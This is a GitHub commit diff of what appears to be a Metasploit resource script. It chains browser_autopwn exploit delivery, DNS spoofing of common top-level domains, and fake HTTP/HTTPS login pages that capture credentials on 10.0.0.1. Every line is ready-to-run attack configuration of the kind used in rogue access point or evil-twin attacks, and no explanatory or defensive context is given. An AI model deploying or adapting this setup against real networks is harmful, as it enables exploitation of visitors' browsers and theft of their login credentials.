Some changes and updates

This commit is contained in:
Francesco Grotti
2016-12-19 15:14:12 +01:00
committed by GitHub
parent c342a54216
commit f3025eff42

View File

@@ -1,12 +1,9 @@
use auxiliary/server/browser_autopwn
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 80
set AUTOPWN_URI /
set LHOST 10.0.0.1
set LPORT 45000
set SRVHOST 10.0.0.1
set SRVPORT 80
set URIPATH /
set SRVPORT 8081
set URIPATH /try
run -j
@@ -27,3 +24,22 @@ set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu, *.fr
set TARGET ACTION BYPASS
set SRVPORT 53
run -j
use auxiliary/server/capture/http
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 8081
set AUTOPWN_URI /try
set SRVHOST 10.0.0.1
set TEMPLATE weblogin/index.html
set SRVPORT 80
run -j
use auxiliary/server/capture/http
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 8081
set AUTOPWN_URI /try
set SRVHOST 10.0.0.1
set TEMPLATE weblogin/index.html
set SSL true
set SRVPORT 443
run -j